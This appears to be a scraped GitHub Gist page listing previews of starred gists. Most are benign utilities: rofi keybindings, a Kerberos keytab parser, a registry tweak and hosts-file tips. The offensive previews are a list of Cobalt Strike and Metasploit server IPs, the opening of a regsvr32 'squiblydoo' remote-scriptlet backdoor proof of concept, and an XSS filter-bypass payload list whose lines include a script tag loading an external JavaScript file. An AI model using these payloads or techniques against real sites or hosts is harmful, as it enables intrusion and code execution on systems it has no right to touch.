Skip to content

Instantly share code, notes, and snippets.

View mfaerevaag's full-sized avatar
:shipit:

Markus Faerevaag mfaerevaag

:shipit:
View GitHub Profile
@MichaelKoczwara
MichaelKoczwara / Cobalt Strike & Metasploit servers
Last active October 22, 2022 06:37
Cobalt Strike & Metasploit servers
Cobalt Strike & Metasploit servers
Cobalt Strike C2 sample report from http://180.215.104.226:80/j.ad
https://tria.ge/210327-65vrb1gqtj
beacon sample:
https://pasteboard.co/JUCfE6Y.jpg
180.215.105.229
@raandree
raandree / Get-KerberosKeytab.ps1
Last active December 27, 2023 02:33
Parses Kerberos Keytab files
param(
[Parameter(Mandatory)]
[string]$Path
)
#Created by [email protected]
#
#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
#
# keytab {
@MilesMcBain
MilesMcBain / rofi.cfg
Created July 17, 2018 02:19
vim like keys for rofi
rofi.kb-row-up: Up,Control+k,Shift+Tab,Shift+ISO_Left_Tab
rofi.kb-row-down: Down,Control+j
rofi.kb-accept-entry: Control+m,Return,KP_Enter
rofi.terminal: mate-terminal
rofi.kb-remove-to-eol: Control+Shift+e
rofi.kb-mode-next: Shift+Right,Control+Tab,Control+l
rofi.kb-mode-previous: Shift+Left,Control+Shift+Tab,Control+h
rofi.kb-remove-char-back: BackSpace
@curi0usJack
curi0usJack / .htaccess
Last active October 5, 2024 14:07
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
#!/bin/bash
address=https://ilo.mysite.com:34043
username=Administrator
password=********
session_key=$(
curl -fsS \
--insecure \
"$address/json/login_session" \
@LordMike
LordMike / RegisterBash.reg
Last active January 29, 2019 11:48
Adds "Open Bash Here" to right-click context menu in Explorer
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\Directory\Background\shell\bash]
"Extended"=""
@="Open Bash here"
[HKEY_CLASSES_ROOT\Directory\Background\shell\bash\command]
@="ubuntu run /bin/bash"
@enigma0x3
enigma0x3 / Backdoor-Minimalist.sct
Last active May 4, 2024 18:03
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
@afogal
afogal / crypto_squirrel.txt
Created September 18, 2016 18:52
keybase squirrel ascii art
▄▄▄▄█▀ 
╭───────────────────────╮ ▄▄ ▄▄▄█▄▄▀ 
│ │ ███▄▄▄▄▄▄▄▄▄▄███▄██ 
│ Encrypt everything! │ ▄▄▄████▄▄▄███████████ 
│ ├──── ▄▄▄▄▄████▄█████████████
@zenorocha
zenorocha / etc-hosts-on-win.md
Last active April 11, 2024 23:07
/etc/hosts on Windows

1. Get your IP Address

echo `ifconfig $(netstat -nr | grep -e default -e "^0\.0\.0\.0" | head -1 | awk '{print $NF}') | grep -e "inet " | sed -e 's/.*inet //' -e 's/ .*//' -e 's/.*\://'`

2. Modify your hosts file

notepad

@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active November 12, 2024 09:17
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>